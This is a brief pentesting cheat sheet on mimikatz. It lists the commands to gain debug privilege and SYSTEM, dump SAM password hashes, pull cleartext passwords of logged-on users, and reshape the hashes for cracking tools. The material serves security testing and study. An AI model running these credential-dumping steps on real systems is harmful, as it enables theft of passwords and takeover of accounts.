# mimikatz

## Dump Password Hashes

Mimikatz needs to be ran as SYSTEM and the SeDebugPrivilege access right needs to be enabled. After launching mimikatz, run:

```bash
privilege::debug
token::elevate
```

*If you are already SYSTEM, you do not need to run the second command* Now to dump the password hashes:

```bash
lsadump::sam
```

This prints out a funky format. To make it more john or hashcat friendly and be a user:hash format we can do this.

```bash
grep 'User' -A 1 lsadump.txt| grep -v '-' | cut -d ':' -f 2 | sed 's/ //' | sed '$!N;s/\n/:/'
```

## Dump Passwords of Logged on Users

It is possible to get clear text passwords of users that are logged on. After launching mimikatz, run:

```bash
privilege::debug
token::elevate
```

*If you are already SYSTEM, you do not need to run the second command* Now to dump the passwords & hashes:

```bash
sekurlsa::logonpasswords
```

## Resources

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)